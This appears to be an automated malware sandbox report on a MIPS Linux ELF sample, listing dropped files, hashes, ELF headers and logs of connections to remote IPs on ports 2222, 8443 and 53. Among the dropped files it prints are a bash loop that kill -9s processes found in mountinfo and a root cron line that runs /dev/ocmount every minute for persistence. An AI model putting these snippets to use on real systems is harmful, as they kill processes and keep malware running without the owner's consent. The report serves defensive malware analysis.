                                                                Preview:#!/bin/bash..while true; do. cat /proc/$$/mountinfo | while read -r line; do. if [[ $line == *" /proc/"* ]]; then. if [[ $line != *"/boot"* ]]; then. PID=$(echo $line | grep -o "/proc/[0-9]*" | grep -o "[0-9]*"). PID=${PID#/proc/}. if [[ -n "$PID" ]]; then. echo "Found process the and kill pid: $PID". kill -9 $PID. fi. fi. fi. done. sleep 30.done.
                                                                Process:/bin/sh
                                                                File Type:ASCII text
                                                                Category:dropped
                                                                Size (bytes):38
                                                                Entropy (8bit):3.8463189626846375
                                                                Encrypted:false
                                                                SSDEEP:3:3P11tKecVLE3Ov:ge7A
                                                                MD5:67EC4A157E5B63970CFBB8CC55883AD7
                                                                SHA1:5262B8C108DC3AEF69FCA6FFD959893DE852DC67
                                                                SHA-256:0CB3CC915BB7492FF579F2B59237A5899088E5C5F238125AC9F0B5F73D2723E7
                                                                SHA-512:EB6310992DC6E3AC1FCA2BCF26D82365494AA0ADBD80EE5EC6231B2418D1DAF6608F7820A560B4FBDA8C8885A59F8A82CA86AAA481F254D207926C1F6C5802B9
                                                                Malicious:true
                                                                Reputation:moderate, very likely benign file
                                                                Preview:* * * * * root /bin/bash /dev/ocmount.
                                                                File type:ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                                                                Entropy (8bit):5.214134601368934
                                                                TrID:
                                                                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                File name:HNzkADzkE2.elf
                                                                File size:238'652 bytes
                                                                MD5:a794f1aa38c600d553af040bdf199400
                                                                SHA1:ab0803048cc5b741d08f618022e9c647ee810e54
                                                                SHA256:f094ee0a1262df00a37029bea3e3b9c1ceb62acedd436e199d78e848c4feac58
                                                                SHA512:42d96e3fd3f49b5c5bf073afce3c5a35f30f9cb99e7c2553187a8ba2aa54aa662dfec05c155699f16a370a09eccec59ebf958921d6f8f2d5926f94d41db49b53
                                                                SSDEEP:3072:EchcJLCggYVpOfk7N+VllzgBKAT8QmghIfEknenOC:EchcJhpOfk7N2WRTX6JnXC
                                                                TLSH:CD34D719AB610FFBD8AFCD3302E90B0524CC651722A53B7A3678D518F64A54F5AE3C78
                                                                File Content Preview:.ELF....................`.@.4...........4. ...(...............@...@.@H..@H..............DH..DHG.DHG.dY..............Q.td...............................<...'!......'.......................<...'!...$.........9'.. ........................<x..'!... .........9

                                                                ELF header

                                                                Class:ELF32
                                                                Data:2's complement, little endian
                                                                Version:1 (current)
                                                                Machine:MIPS R3000
                                                                Version Number:0x1
                                                                Type:EXEC (Executable file)
                                                                OS/ABI:UNIX - System V
                                                                ABI Version:0
                                                                Entry Point Address:0x400260
                                                                Flags:0x1007
                                                                ELF Header Size:52
                                                                Program Header Offset:52
                                                                Program Header Size:32
                                                                Number of Program Headers:3
                                                                Section Header Offset:238092
                                                                Section Header Size:40
                                                                Number of Section Headers:14
                                                                Header String Table Index:13
                                                                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                NULL0x00x00x00x00x0000
                                                                .initPROGBITS0x4000940x940x8c0x00x6AX004
                                                                .textPROGBITS0x4001200x1200x30ed00x00x6AX0016
                                                                .finiPROGBITS0x430ff00x30ff00x5c0x00x6AX004
                                                                .rodataPROGBITS0x4310500x310500x37f00x00x2A0016
                                                                .ctorsPROGBITS0x4748440x348440xc0x00x3WA004
                                                                .dtorsPROGBITS0x4748500x348500x80x00x3WA004
                                                                .data.rel.roPROGBITS0x47485c0x3485c0x46c0x00x3WA004
                                                                .dataPROGBITS0x474ce00x34ce00x49900x00x3WA0032
                                                                .gotPROGBITS0x4796700x396700xb380x40x10000003WAp0016
                                                                .sbssNOBITS0x47a1a80x3a1a80x4c0x00x10000003WAp004
                                                                .bssNOBITS0x47a2000x3a1a80x46e00x00x3WA0016
                                                                .mdebug.abi32PROGBITS0x154e0x3a1a80x00x00x0001
                                                                .shstrtabSTRTAB0x00x3a1a80x640x00x0001
                                                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                LOAD0x00x4000000x4000000x348400x348405.48840x5R E0x10000.init .text .fini .rodata
                                                                LOAD0x348440x4748440x4748440x59640xa09c1.46380x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
                                                                GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 7, 2024 01:12:55.382766962 CEST407202222192.168.2.13212.118.43.167
                                                                Oct 7, 2024 01:12:55.387614012 CEST222240720212.118.43.167192.168.2.13
                                                                Oct 7, 2024 01:12:55.387684107 CEST407202222192.168.2.13212.118.43.167
                                                                Oct 7, 2024 01:12:55.389573097 CEST407202222192.168.2.13212.118.43.167
                                                                Oct 7, 2024 01:12:55.389573097 CEST407202222192.168.2.13212.118.43.167
                                                                Oct 7, 2024 01:12:55.394349098 CEST222240720212.118.43.167192.168.2.13
                                                                Oct 7, 2024 01:12:55.436206102 CEST222240720212.118.43.167192.168.2.13
                                                                Oct 7, 2024 01:13:16.741233110 CEST222240720212.118.43.167192.168.2.13
                                                                Oct 7, 2024 01:13:16.741461992 CEST407202222192.168.2.13212.118.43.167
                                                                Oct 7, 2024 01:13:19.281732082 CEST436528443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:19.286569118 CEST844343652156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:19.286638021 CEST436528443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:19.286926985 CEST436528443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:19.291702032 CEST844343652156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:19.291754007 CEST436528443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:19.296597004 CEST844343652156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:19.711118937 CEST436548443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:19.715976954 CEST844343654156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:19.716088057 CEST436548443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:19.716708899 CEST436548443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:19.721546888 CEST844343654156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:19.721596003 CEST436548443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:19.726453066 CEST844343654156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:19.866023064 CEST844343652156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:19.866278887 CEST436528443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:19.871093988 CEST844343652156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:20.310280085 CEST844343654156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:20.310486078 CEST436548443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:20.310631990 CEST436548443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:20.315563917 CEST844343654156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:20.897675991 CEST436568443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:20.902590036 CEST844343656156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:20.902667046 CEST436568443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:20.902699947 CEST436568443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:20.907557964 CEST844343656156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:20.907604933 CEST436568443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:20.912425041 CEST844343656156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:21.342154026 CEST436588443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:21.347044945 CEST844343658156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:21.347121000 CEST436588443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:21.347178936 CEST436588443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:21.352169037 CEST844343658156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:21.352229118 CEST436588443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:21.357189894 CEST844343658156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:21.500078917 CEST844343656156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:21.500185013 CEST436568443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:21.504995108 CEST844343656156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:21.942115068 CEST844343658156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:21.942262888 CEST436588443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:21.947168112 CEST844343658156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:47.523016930 CEST436608443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:47.529222012 CEST844343660156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:47.529299021 CEST436608443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:47.529335976 CEST436608443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:47.534219027 CEST844343660156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:47.534275055 CEST436608443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:47.539123058 CEST844343660156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:47.959021091 CEST436628443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:47.963933945 CEST844343662156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:47.964029074 CEST436628443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:47.964091063 CEST436628443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:47.968866110 CEST844343662156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:47.968971014 CEST436628443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:47.973699093 CEST844343662156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:48.152683020 CEST844343660156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:48.152795076 CEST436608443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:48.157593012 CEST844343660156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:48.530915022 CEST844343662156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:48.531039000 CEST436628443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:48.535864115 CEST844343662156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:49.154289961 CEST436648443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:49.369146109 CEST844343664156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:49.369255066 CEST436648443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:49.369317055 CEST436648443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:49.374099016 CEST844343664156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:49.374157906 CEST436648443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:49.378946066 CEST844343664156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:49.532242060 CEST436668443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:49.537107944 CEST844343666156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:49.537178040 CEST436668443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:49.537210941 CEST436668443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:49.541980028 CEST844343666156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:49.542045116 CEST436668443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:49.546869040 CEST844343666156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:49.950084925 CEST844343664156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:49.950195074 CEST436648443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:49.954989910 CEST844343664156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:50.141793966 CEST844343666156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:13:50.141930103 CEST436668443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:13:50.146697998 CEST844343666156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:15.971683025 CEST436688443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:15.976488113 CEST844343668156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:15.976603985 CEST436688443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:15.976639986 CEST436688443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:15.981610060 CEST844343668156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:15.981689930 CEST436688443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:15.987278938 CEST844343668156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:16.165183067 CEST436708443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:16.170047045 CEST844343670156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:16.170222044 CEST436708443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:16.170222044 CEST436708443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:16.175129890 CEST844343670156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:16.175311089 CEST436708443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:16.180229902 CEST844343670156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:16.545315981 CEST844343668156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:16.545459032 CEST436688443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:16.550328016 CEST844343668156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:16.742198944 CEST844343670156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:16.742419958 CEST436708443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:16.747404099 CEST844343670156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:17.546937943 CEST436728443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:17.551712990 CEST844343672156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:17.551863909 CEST436728443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:17.551908016 CEST436728443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:17.556720018 CEST844343672156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:17.556835890 CEST436728443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:17.561641932 CEST844343672156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:17.743985891 CEST436748443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:17.748894930 CEST844343674156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:17.749149084 CEST436748443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:17.749191046 CEST436748443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:17.754013062 CEST844343674156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:17.754122972 CEST436748443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:17.758953094 CEST844343674156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:18.137356997 CEST844343672156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:18.137567043 CEST436728443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:18.142643929 CEST844343672156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:18.355484962 CEST844343674156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:18.355600119 CEST436748443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:18.360567093 CEST844343674156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:19.169140100 CEST436768443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:19.174067974 CEST844343676156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:19.174144983 CEST436768443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:19.174201965 CEST436768443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:19.179069996 CEST844343676156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:19.179142952 CEST436768443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:19.184165001 CEST844343676156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:19.386107922 CEST436788443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:19.391577005 CEST844343678156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:19.391699076 CEST436788443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:19.391743898 CEST436788443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:19.396522045 CEST844343678156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:19.396596909 CEST436788443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:19.401386023 CEST844343678156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:19.754414082 CEST844343676156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:19.754571915 CEST436768443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:19.759577036 CEST844343676156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:19.966317892 CEST844343678156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:19.966451883 CEST436788443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:19.966500998 CEST436788443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:19.971776962 CEST844343678156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:20.756072044 CEST436808443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:20.760869980 CEST844343680156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:20.760977983 CEST436808443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:20.761039019 CEST436808443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:20.766134977 CEST844343680156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:20.766328096 CEST436808443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:20.771137953 CEST844343680156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:20.968748093 CEST436828443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:20.973596096 CEST844343682156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:20.973786116 CEST436828443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:20.973954916 CEST436828443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:20.978698015 CEST844343682156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:20.978800058 CEST436828443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:20.983602047 CEST844343682156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:21.416307926 CEST844343680156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:21.416538000 CEST436808443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:21.421437025 CEST844343680156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:21.612427950 CEST844343682156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:21.612767935 CEST436828443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:21.617767096 CEST844343682156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:22.474168062 CEST436848443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:22.478982925 CEST844343684156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:22.479096889 CEST436848443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:22.479118109 CEST436848443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:22.484051943 CEST844343684156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:22.484219074 CEST436848443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:22.489029884 CEST844343684156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:23.091301918 CEST844343684156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:23.091419935 CEST436848443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:23.097989082 CEST844343684156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:24.092498064 CEST436868443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:24.097301960 CEST844343686156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:24.097420931 CEST436868443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:24.097507000 CEST436868443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:24.102529049 CEST844343686156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:24.102593899 CEST436868443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:24.107441902 CEST844343686156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:24.671042919 CEST844343686156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:24.671205997 CEST436868443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:24.675995111 CEST844343686156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:25.687674999 CEST436888443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:25.692522049 CEST844343688156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:25.692574978 CEST436888443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:25.692611933 CEST436888443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:25.697431087 CEST844343688156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:25.697504044 CEST436888443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:25.702274084 CEST844343688156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:26.283701897 CEST844343688156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:26.283818007 CEST436888443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:26.288655043 CEST844343688156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:27.293562889 CEST436908443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:27.299688101 CEST844343690156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:27.299777985 CEST436908443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:27.299819946 CEST436908443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:27.305037975 CEST844343690156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:27.305144072 CEST436908443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:27.309952021 CEST844343690156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:27.664117098 CEST436928443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:27.669111013 CEST844343692156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:27.669213057 CEST436928443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:27.669248104 CEST436928443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:27.674280882 CEST844343692156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:27.674364090 CEST436928443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:27.679233074 CEST844343692156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:27.897013903 CEST844343690156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:27.897217989 CEST436908443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:27.902098894 CEST844343690156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:28.254615068 CEST844343692156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:28.254740000 CEST436928443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:28.259674072 CEST844343692156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:29.256047964 CEST436948443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:29.260936022 CEST844343694156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:29.261020899 CEST436948443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:29.261084080 CEST436948443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:29.265845060 CEST844343694156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:29.265912056 CEST436948443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:29.270715952 CEST844343694156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:29.839807034 CEST844343694156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:29.839972973 CEST436948443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:29.844825983 CEST844343694156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:30.857263088 CEST436968443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:30.862242937 CEST844343696156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:30.862364054 CEST436968443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:30.862382889 CEST436968443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:30.867554903 CEST844343696156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:30.867644072 CEST436968443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:30.872607946 CEST844343696156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:31.547141075 CEST844343696156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:31.547276020 CEST436968443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:31.552032948 CEST844343696156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:32.556720018 CEST436988443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:32.561522007 CEST844343698156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:32.561619043 CEST436988443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:32.561619043 CEST436988443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:32.566426992 CEST844343698156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:32.566551924 CEST436988443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:32.571322918 CEST844343698156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:33.166163921 CEST844343698156.238.224.214192.168.2.13
                                                                Oct 7, 2024 01:14:33.166349888 CEST436988443192.168.2.13156.238.224.214
                                                                Oct 7, 2024 01:14:33.171233892 CEST844343698156.238.224.214192.168.2.13
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 7, 2024 01:12:54.260118008 CEST3539553192.168.2.13178.254.22.166
                                                                Oct 7, 2024 01:12:54.682182074 CEST3768653192.168.2.13178.254.22.166
                                                                Oct 7, 2024 01:12:59.268496990 CEST5245653192.168.2.13178.254.22.166
                                                                Oct 7, 2024 01:12:59.690359116 CEST3436653192.168.2.13178.254.22.166
                                                                Oct 7, 2024 01:13:04.272105932 CEST5763353192.168.2.13178.254.22.166
                                                                Oct 7, 2024 01:13:04.696006060 CEST4449753192.168.2.13178.254.22.166
                                                                Oct 7, 2024 01:13:09.275377989 CEST3842353192.168.2.13178.254.22.166
                                                                Oct 7, 2024 01:13:09.701647997 CEST4227453192.168.2.13178.254.22.166
                                                                Oct 7, 2024 01:13:14.279406071 CEST5060453192.168.2.13178.254.22.166
                                                                Oct 7, 2024 01:13:14.707361937 CEST5465853192.168.2.13178.254.22.166
                                                                Oct 7, 2024 01:13:20.869074106 CEST3595953192.168.2.1381.169.136.222
                                                                Oct 7, 2024 01:13:20.896717072 CEST533595981.169.136.222192.168.2.13
                                                                Oct 7, 2024 01:13:21.313589096 CEST5119053192.168.2.1381.169.136.222
                                                                Oct 7, 2024 01:13:21.341346979 CEST535119081.169.136.222192.168.2.13
                                                                Oct 7, 2024 01:13:22.502372980 CEST3805453192.168.2.1351.254.162.59
                                                                Oct 7, 2024 01:13:22.944632053 CEST4360653192.168.2.1351.254.162.59
                                                                Oct 7, 2024 01:13:27.507249117 CEST5830453192.168.2.1351.254.162.59
                                                                Oct 7, 2024 01:13:27.947137117 CEST6025953192.168.2.1351.254.162.59
                                                                Oct 7, 2024 01:13:32.511687994 CEST3727953192.168.2.1351.254.162.59
                                                                Oct 7, 2024 01:13:32.951416016 CEST3766453192.168.2.1351.254.162.59
                                                                Oct 7, 2024 01:13:37.515214920 CEST5541853192.168.2.1351.254.162.59
                                                                Oct 7, 2024 01:13:37.953008890 CEST5774353192.168.2.1351.254.162.59
                                                                Oct 7, 2024 01:13:42.517524958 CEST4322953192.168.2.1351.254.162.59
                                                                Oct 7, 2024 01:13:42.955636978 CEST5818053192.168.2.1351.254.162.59
                                                                Oct 7, 2024 01:13:50.951791048 CEST6091753192.168.2.1351.254.162.59
                                                                Oct 7, 2024 01:13:51.143393040 CEST4138053192.168.2.1351.254.162.59
                                                                Oct 7, 2024 01:13:55.956660032 CEST3534553192.168.2.1351.254.162.59
                                                                Oct 7, 2024 01:13:56.147526979 CEST4692853192.168.2.1351.254.162.59
                                                                Oct 7, 2024 01:14:00.959481955 CEST3796253192.168.2.1351.254.162.59
                                                                Oct 7, 2024 01:14:01.152087927 CEST4136853192.168.2.1351.254.162.59
                                                                Oct 7, 2024 01:14:05.965243101 CEST3909553192.168.2.1351.254.162.59
                                                                Oct 7, 2024 01:14:06.156385899 CEST4542853192.168.2.1351.254.162.59
